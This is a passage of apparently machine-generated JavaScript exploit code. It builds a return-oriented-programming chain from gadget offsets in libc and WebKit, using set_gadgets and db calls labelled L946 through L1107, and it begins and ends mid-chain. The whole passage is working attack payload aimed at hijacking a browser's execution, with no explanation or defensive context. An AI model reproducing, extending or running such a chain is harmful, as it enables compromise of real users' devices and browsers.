[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L946: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+102712, //L947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L947: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+102784, //L950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L950: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+102840, //L951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L951: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L953: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+102976, //L954 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L954: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L956: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+103096, //L959 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+103080, //L957 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L957: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L959: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+103240, //L962 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+103208, //L960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+103224, //L961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L960: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L961: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L962: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+103312, //L964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L964: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+103368, //L965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L965: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+103464, //L968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L967: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L968: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L969: db([17, 0]); // 0x11 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+103560, //L970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+103576, //L971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L970: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L971: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+103664, //L973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L973: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+103720, //L974 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L974: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+103792, //L977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L977: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+103848, //L978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L978: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L980: libc_base+764760, //pop rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+103984, //L981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L981: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L983: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+104104, //L986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+104088, //L984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L984: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L986: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+104248, //L989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+104216, //L987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+104232, //L988 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L987: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L988: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L989: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+104320, //L991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L991: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+104376, //L992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L992: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+104472, //L995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L994: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L995: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L996: db([18, 0]); // 0x12 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+104568, //L997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+104584, //L998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L997: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L998: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+104672, //L1000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1000: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+104728, //L1001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1001: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+104800, //L1004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1004: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+104856, //L1005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1005: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+104944, //L1007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1007: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1009: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+105064, //L1012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+105048, //L1010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1010: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1012: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+105208, //L1015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+105176, //L1013 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+105192, //L1014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1013: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1014: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1015: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+105280, //L1017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1017: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+105336, //L1018 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1018: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+105432, //L1021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1020: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1021: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1022: db([3, 0]); // 0x3 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+105528, //L1023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+105544, //L1024 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1023: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1024: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+105632, //L1026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1026: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+105688, //L1027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1027: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+105792, //L1029 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1029: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1031: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+105912, //L1034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+105896, //L1032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1032: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1034: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+106056, //L1037 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+106024, //L1035 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+106040, //L1036 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1035: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1036: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1037: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+106128, //L1039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1039: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+106184, //L1040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1040: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+106280, //L1043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1042: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1043: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1044: db([19, 0]); // 0x13 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+106376, //L1045 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+106392, //L1046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1045: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1046: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+106480, //L1048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1048: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+106536, //L1049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1049: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+106608, //L1052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1052: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+106664, //L1053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1053: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1055: webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+106800, //L1056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1056: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1058: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+106920, //L1061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+106904, //L1059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1059: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1061: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+107064, //L1064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+107032, //L1062 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+107048, //L1063 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1062: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1063: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1064: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+107136, //L1066 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1066: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+107192, //L1067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1067: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+107288, //L1070 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1069: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1070: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1071: db([20, 0]); // 0x14 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+107384, //L1072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+107400, //L1073 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1072: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1073: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+107488, //L1075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1075: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+107544, //L1076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1076: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+107616, //L1079 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1079: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+107672, //L1080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1080: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1082: libc_base+763368, //pop rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+107808, //L1083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1083: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1085: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+107928, //L1088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+107912, //L1086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1086: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1088: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+108072, //L1091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+108040, //L1089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+108056, //L1090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1089: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1090: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1091: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+108144, //L1093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1093: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+108200, //L1094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1094: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+108296, //L1097 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1096: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1097: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1098: db([21, 0]); // 0x15 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+108392, //L1099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+108408, //L1100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1099: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1100: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+108496, //L1102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1102: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+108552, //L1103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1103: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+108624, //L1106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1106: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+108680, //L1107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1107: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+108768, 